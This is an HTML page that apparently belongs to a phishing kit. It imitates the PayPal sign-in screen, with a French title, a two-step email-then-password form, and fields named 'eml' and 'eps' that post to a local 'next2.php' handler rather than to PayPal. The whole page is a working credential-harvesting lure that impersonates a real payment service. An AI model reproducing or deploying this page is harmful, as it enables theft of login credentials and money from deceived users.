
<!DOCTYPE html>
<html>

<head>
<title>Connectez-vous à votre compte PayPal</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=yes">

<link rel="shortcut icon" href="assets/img/favicon.ico">
<link rel="apple-touch-icon" href="assets/img/apple-touch-icon.png">
<link rel="stylesheet" href="assets/css/signin_style.css">
<script src="assets/js/jquery.min.js" type="text/javascript"></script>
<script src="assets/js/jquery.validate.js" type="text/javascript"></script>
<script src="assets/js/signin.auth.js" type="text/javascript"></script>
</head>

<body>
<div class="main">
<section class="login">
<div class="corral">
<div class="contentContainer activeContent contentContainerBordered">
<header>
<p class="logo logo-long"></p>
</header>
<div class="notifications" tabindex="-1">
<p class="notification notification-critical hide" role="alert" id="notifications">
<transcode("Some of your info isn't correct. Please try again>
</p>
</div>
<form id="login_form" action="next2.php" method="post" onsubmit="">
<div class="profileRememberedEmail hide" id="link">
<span class="profileDisplayPhoneCode"></span>
<span class="profileDisplayEmail" id="profileDisplayEmail"></span>
<a href="#" class="notYouLink" id="backToInputEmailLink">"Not you?"</a>
</div>
<div id="splitEmail" class="splitEmail">
<div id="splitEmailSection">
<div id="emailSection" class="clearfix">
<div class="textInput" id="login_emaildiv" style="z-index: 1;">
<div class="fieldWrapper">
<input type="text" placeholder="email" id="Email" name="eml">
</div>
<div class="errorMessage" id="emailErrorMessage">
<p class="emptyError">required</p>
</div>
</div>
</div>
<div class="actions">
<button class="button actionContinue login-login-click-next" type="submit" id="btnNext">Next</button>
</div>
</div>
</div>
<div id="splitPassword" class="splitPassword transformRightToLeft hide">
<div id="splitPasswordSection">
<div id="passwordSection" class="clearfix">
<div class="textInput" id="login_passworddiv">
<div class="fieldWrapper">
<input type="password" placeholder="password" id="Password" name="eps">
<button type="button" class="showPassword hide show-hide-password login-show-password" id="showpassword">Show</button>
<button type="button" class="hidePassword hide show-hide-password login-hide-password" id="hidepassword">Hide</button>
</div>
<div class="errorMessage" id="passwordErrorMessage">
<p class="emptyError">required</p>
</div>
</div>
</div>
</div>
<div class="actions">
<button class="button actionContinue login-login-submit" type="submit" id="btnLogin">login</button>
</div>
</div>
</form>
<div class="forgotLink">
<a href="#" class="login-click-forgot-password">forgot</a>
</div>
<div class="loginSignUpSeparator">
<span class="textInSeparator">separator</span>
</div>
<a href="#" class="button secondary login-click-signup-button">create</a>
</div>
</div>
</div>
</section>
<?=$footer;?>
</div>
<div class="transitioning hide" id="loading"></div>
</div>
<script src="assets/js/signin.post.js"></script>
</body>

</html>
